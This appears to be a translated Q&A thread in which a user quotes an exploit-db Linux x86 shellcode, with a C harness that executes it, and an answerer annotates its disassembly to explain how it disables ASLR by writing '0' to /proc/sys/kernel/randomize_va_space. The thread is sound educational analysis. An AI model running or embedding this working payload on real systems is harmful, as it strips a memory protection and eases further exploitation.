1

在exploit-db上发现了以下exploit,我只是想知道这个东西看起来很接近时是如何工作的。

我真的不知道发生了什么,除了我发现它用于禁用缓冲区溢出保护。这些是对寄存器的调用吗?这是只有通过模糊测试才能找到的东西吗?

/*
Title:  Linux x86 ASLR deactivation - 83 bytes
Author: Jean Pascal Pereira <pereira@secbiz.de>
Web:    http://0xffe4.org


Disassembly of section .text:

08048060 <_start>:
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       50                      push   %eax
 8048063:       68 70 61 63 65          push   $0x65636170
 8048068:       68 76 61 5f 73          push   $0x735f6176
 804806d:       68 69 7a 65 5f          push   $0x5f657a69
 8048072:       68 6e 64 6f 6d          push   $0x6d6f646e
 8048077:       68 6c 2f 72 61          push   $0x61722f6c
 804807c:       68 65 72 6e 65          push   $0x656e7265
 8048081:       68 79 73 2f 6b          push   $0x6b2f7379
 8048086:       68 6f 63 2f 73          push   $0x732f636f
 804808b:       68 2f 2f 70 72          push   $0x72702f2f
 8048090:       89 e3                   mov    %esp,%ebx
 8048092:       66 b9 bc 02             mov    $0x2bc,%cx
 8048096:       b0 08                   mov    $0x8,%al
 8048098:       cd 80                   int    $0x80
 804809a:       89 c3                   mov    %eax,%ebx
 804809c:       50                      push   %eax
 804809d:       66 ba 30 3a             mov    $0x3a30,%dx
 80480a1:       66 52                   push   %dx
 80480a3:       89 e1                   mov    %esp,%ecx
 80480a5:       31 d2                   xor    %edx,%edx
 80480a7:       42                      inc    %edx
 80480a8:       b0 04                   mov    $0x4,%al
 80480aa:       cd 80                   int    $0x80
 80480ac:       b0 06                   mov    $0x6,%al
 80480ae:       cd 80                   int    $0x80
 80480b0:       40                      inc    %eax
 80480b1:       cd 80                   int    $0x80



*/

#include <stdio.h>

 char shellcode[] = "\x31\xc0\x50\x68\x70\x61\x63\x65\x68\x76\x61\x5f\x73\x68"
                   "\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61"
                   "\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f"
                   "\x73\x68\x2f\x2f\x70\x72\x89\xe3\x66\xb9\xbc\x02\xb0\x08"
                   "\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31"
                   "\xd2\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\x40\xcd\x80";


int main()
{
  fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
  (*(void  (*)()) shellcode)();
}
4

1 回答 1

4

这不是漏洞,而是x86 汇编语言代码,用于通过使用多个系统调用0简单地写入/proc/sys/kernel/randomize_va_space以禁用地址空间布局随机化 (ASLR)的程序:

; reset EAX to zero
 8048060:       31 c0                   xor    %eax,%eax

; first argument: null terminated string "//proc/sys/kernel/randomize_va_space"
 8048062:       50                      push   %eax
 8048063:       68 70 61 63 65          push   $0x65636170
 8048068:       68 76 61 5f 73          push   $0x735f6176
 804806d:       68 69 7a 65 5f          push   $0x5f657a69
 8048072:       68 6e 64 6f 6d          push   $0x6d6f646e
 8048077:       68 6c 2f 72 61          push   $0x61722f6c
 804807c:       68 65 72 6e 65          push   $0x656e7265
 8048081:       68 79 73 2f 6b          push   $0x6b2f7379
 8048086:       68 6f 63 2f 73          push   $0x732f636f
 804808b:       68 2f 2f 70 72          push   $0x72702f2f
; first argument: address of above string
 8048090:       89 e3                   mov    %esp,%ebx
; second argument: file mode
 8048092:       66 b9 bc 02             mov    $0x2bc,%cx
; system call: sys_creat("//proc/sys/kernel/randomize_va_space", 0x2bc)
 8048096:       b0 08                   mov    $0x8,%al
 8048098:       cd 80                   int    $0x80

; first argument: file descriptor returned by sys_creat
 804809a:       89 c3                   mov    %eax,%ebx
 804809c:       50                      push   %eax
 804809d:       66 ba 30 3a             mov    $0x3a30,%dx
 80480a1:       66 52                   push   %dx
; second argument: null terminated string "0:"
 80480a3:       89 e1                   mov    %esp,%ecx
; third argument: 1
 80480a5:       31 d2                   xor    %edx,%edx
 80480a7:       42                      inc    %edx
; system call: sys_write(fd, "0:", 1)
 80480a8:       b0 04                   mov    $0x4,%al
 80480aa:       cd 80                   int    $0x80

; system call: sys_close(fd)
 80480ac:       b0 06                   mov    $0x6,%al
 80480ae:       cd 80                   int    $0x80

; system_call: sys_waitpid()
 80480b0:       40                      inc    %eax
 80480b1:       cd 80                   int    $0x80

所以基本上:

int fd = sys_creat("//proc/sys/kernel/randomize_va_space", 0x2bc);
sys_write(fd, "0:", 1);
sys_close(fd);
sys_waitpid();

路径的前导双斜杠//仅用于对齐。并且:后面0是无关紧要的,因为要写入的字节数设置为 1。

请注意,这段代码只是禁用了 ASLR,与缓冲区溢出保护无关。事实上,攻击者可能已经利用缓冲区溢出漏洞来执行此代码。

于 2013-11-08T17:44:42.540 回答